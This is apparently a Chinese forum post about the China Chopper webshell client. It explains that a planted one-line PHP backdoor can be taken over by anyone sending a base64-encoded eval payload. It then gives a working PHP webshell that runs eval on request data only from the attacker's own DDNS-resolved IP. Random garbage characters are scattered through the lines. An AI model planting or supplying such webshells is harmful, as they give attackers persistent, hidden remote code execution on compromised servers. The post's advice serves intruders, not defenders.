今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
% \/ U- o: r1 T; m9 r
) b5 S* N" O/ {1 e, X就算你设置了密码,使用了eval($_REQUEST['moyo']);) A) ~8 `7 p# ] T& {
P+ X' Q. f. j+ d h$ [5 s$ z但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门" r0 ^3 h" N2 q: \- _
; T: l$ K( ^& n+ Z/ P) c/ t0 ?因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));6 d2 [& \0 T! m9 q- Y
& l5 x' H4 g# H# T: o9 N; T5 l
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
$ ~$ U7 x# C+ v7 F& i* A& @! r; V$ \7 f0 F$ r* @( [
不知道是设计缺陷还是故意留的后门2 a( k( z" @. P- P
% Z- |1 r8 q2 z/ j6 G4 u5 ?) j如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用$ z; I; Q+ u. Z# E9 M6 E! _
8 Y! x, C+ R" g! Z本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
8 c* c; N: k2 E( j# h
# } c+ Q. T+ O: \5 N然后一句话后门这样写
* }. i; f4 t [; b. i: N
/ N r9 n! G2 U5 \3 }% c<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>0 g4 b/ ~/ C0 b3 b% H! I! s
这样就可以让一句话后门只允许自己的电脑连接了( W6 ?3 l$ Z( x E
0 D8 c' V1 U* E
|